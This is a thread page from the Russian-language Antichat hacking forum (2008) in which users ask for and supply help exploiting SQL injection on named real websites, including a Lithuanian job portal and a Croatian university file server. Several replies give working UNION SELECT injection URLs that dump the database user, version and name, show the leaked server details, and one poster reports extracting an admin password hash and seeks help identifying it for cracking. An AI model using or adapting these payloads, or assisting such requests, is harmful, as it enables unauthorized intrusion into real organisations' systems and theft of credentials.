ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3211  
Старый 05.09.2008, 00:35
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

че с этой мутью делать? как её перекодировать?
вывел с помощью mysql-inj:
Љ�гЊя
 
Ответить с цитированием

  #3212  
Старый 05.09.2008, 01:08
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

возможно это "свой" метод шифрования. Тебе бы не помешало посмотреть сорцы.
самый протсой метод шифрования - это:

1 беррётся Ascii код символа и к мне му прибавляется\отнимается\ка кое-то чисто. В итоге получается такая вот муть =)
 
Ответить с цитированием

  #3213  
Старый 05.09.2008, 01:45
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Цитата:
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\'\'\'' at line 1
ничего и не получится - там параметр в ковычках, а ковычки экранизируются слешем
 
Ответить с цитированием

  #3214  
Старый 05.09.2008, 13:54
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

Возможно ли провести иньекцию.
http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;UAB%20%22Aidma%27%22

нашол ошибки а за юзать не выходит.
 
Ответить с цитированием

  #3215  
Старый 05.09.2008, 18:21
paulzey
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216

Репутация: 59
Отправить сообщение для paulzey с помощью ICQ
По умолчанию

Цитата:
Сообщение от tor4)  
Возможно ли провести иньекцию.
Возможно! (Чуть не написал "легко", нифига не так просто. )
Код:
http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;123'%20and%201=2%20union%20select%201,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8%23
karjeroscentras@195.14.170.12:4.0.18:karjeroscentr as

Можно пытаться раскручивать дальше. Иньекция не слепая, показывает запрос и количество полей, короче, время провёл не зря. (Даже не подозревал, что так могу. )
Если отдельные моменты будут непонятны - могу расписать, правда, не факт, что появлюсь тут до понедельника.

В любом случае, большое спасибо за увлекательную задачу.
 
Ответить с цитированием

  #3216  
Старый 05.09.2008, 18:29
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

вытянул пароль из таблицы admin
711de2ca756942dc
что за шифрование не подскажете? не мускульная ль функция?
 
Ответить с цитированием

  #3217  
Старый 05.09.2008, 18:52
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

o3,14um похоже это обычный mysql
 
Ответить с цитированием

  #3218  
Старый 05.09.2008, 19:09
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

да, так оно и есть, 100% мускульная функция пасвод
 
Ответить с цитированием

  #3219  
Старый 05.09.2008, 22:48
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'
 
Ответить с цитированием

  #3220  
Старый 05.09.2008, 23:11
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от .Striker  
помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'
http://web.ffos.hr/serv_file.php?file=-44+union+select+1,2,concat_ws(0x40,version(),user( ),database()),4,5,6,7,8/*
вывод 3и4....4-название файла..3 внутри файла...

Последний раз редактировалось DimOnOID; 05.09.2008 в 23:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ